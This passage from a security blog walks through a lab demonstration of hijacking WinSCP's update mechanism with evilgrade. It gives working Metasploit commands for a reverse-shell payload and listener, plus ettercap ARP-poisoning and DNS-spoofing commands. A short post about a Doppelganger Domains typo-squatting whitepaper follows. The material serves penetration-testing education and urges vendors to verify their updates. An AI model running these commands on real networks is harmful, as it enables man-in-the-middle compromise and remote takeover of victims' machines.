– Dap 9.5.0.3
– Winscp 4.2.9
– AutoIt Script 3.3.6.1
– Clamwin 0.96.0.1
– AppTapp Installer 3.11 (Iphone/Itunes)
– getjar (facebook.com)
– Google Analytics Javascript injection
– Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
– Winamp 5.581

Exploitation:

How does this all work? We are going to use WinSCP as an example, which is a very common file transfer software.  My initial setup is that I have two boxes ready.  One is the host that will run the WinSCP software and the other is an attacker host which is running Backtrack 5.

First, you need to figure out where the software WinSCP looks for updates once the application is installed. I booted up Wireshark, executed WinSCP, and looked at the output. Wireshark Output:

Wireshark Output Showing the Host Name

So, from the output we see that WinSCP goes to winscp.net. Nothing to crazy here.

1) On Backtrack 5, I downloaded the newest Metasploit version 5 and installed ettercap.

2) Evilgrade needs a malicious payload to give the client trying to upgrade.  We are going to go to metasploit to create this reverse shell.  Go into the Agent folder in evilgrade (/pentest/exploits/isr-evilgrade/agent) and type:

Code: /opt/framework-4.0.0/msf3/msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.1.10 LPORT=8081 X > super_update.exe
Image: super_update.exe Reverse Shell

This created a file called super_update.exe that when executed makes a reverse shell back to my host (10.0.1.10).

3) Now that we have our malicious payload, we need to setup a listener so that the reverse shell can connect back to you through Metasploit:

Code: /opt/framework-4.0.0/msf3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=8081 LHOST=0.0.0.0 E
Image: Reverse Shell

4) We know that our host is going to go to call to winscp.net when it tries to update, so we need to make sure that it resolves to our attacker box.

Code: echo "winscp.net A 10.0.1.10" >> /usr/local/share/ettercap/etter.dns

What this does is modifies the ettercap filter, so that when anyone asks for winscp.net, we are going to give them our attacker IP (10.0.1.10).

5) Our next step will be to arp posion the host machine so that any DNS request is going to be sent through our attacker box. Easiest way to do this will be through ettercap:

Code: ettercap -TqM arp:remote /10.0.1.7/ /10.0.1.1/
Image: Running Ettercap

Once inside ettercap, press the letter “P” and choose “dns_spoof”
Image: DNS Spoof

6) Now we are ready to run evilgrade! ./evilgrade
6a) Run: conf winscp
6b) Run: set agent /pentest/exploit/isr-evilgrade/agent/super_update.exe
6c) Run: start

Image: Running Evilgrade

7) We are all set. Now when the user executes WinSCP and it tries to update, the host will look for winscp.net. Luckily, our man-in-the-middle setup, redirects winscp.net to our attacker box (10.0.1.10). Even better is that evilgrade setup a webserver to host our agent (reverse shell) file. If you look closely, it updates with version 9.6.6, which is not a valid WinSCP version.

Image: WinSCP tries to Update
Image: Reverse Shell Gets Delivered
Image: Exploited Box!!!

8) And look, Exploitation complete! Full control of our host machine via updates.

Now why does this work. It’s because many of these software companies do not use cryptographic key to validate updates that only that specific vendor would use. Most applications do not try to do any validation, therefore they become an easy target for exploitation. Go sniff you application updates and make sure that they do some type of authentication/verification before downloading their update. If they don’t, go ask them to!

Doppelganger Domains

Sep 06, 2011 in Security

[SecurePlanet Wiki][SecurePlanet RSS Feed][SecurePlanet RSS Vulnerabilities]

Sorry for not being able to update in a while, but I have been spending a lot of time on the Doppelganger Domains project. Check out our final product here: http://godaigroup.net/publications/doppelganger-domains/

Domain typo-squatting is commonly used to spread malware to users whom accidentally misspell a legitimate domain in their web browser. A new type of domain typo-squatting takes advantage of an omission instead of a misspelling. A Doppelganger Domain is a domain spelled identical to a legitimate fully qualified domain name (FQDN) but missing the dot between host/subdomain and domain, to be used for malicious purposes. Doppelganger Domains have a potent impact via email as attackers could gather information such as trade secrets, user names and passwords, and other employee information.

Each company in the Fortune 500 was profiled for susceptibility to Doppelganger Domains and 151 companies (or 30%) were found to be susceptible. In large corporations, email usage is extremely high and the likelihood of some email being mis-sent is high which could result in data leakage.

Download and read the whitepaper for impact details, vulnerability prevalence, and mitigation strategies. We are also offering a free scan to identify if your domain is vulnerable to the doppelganger domain attack.

http://files.godaigroup.net/doppelganger/Doppelganger.Domains.pdf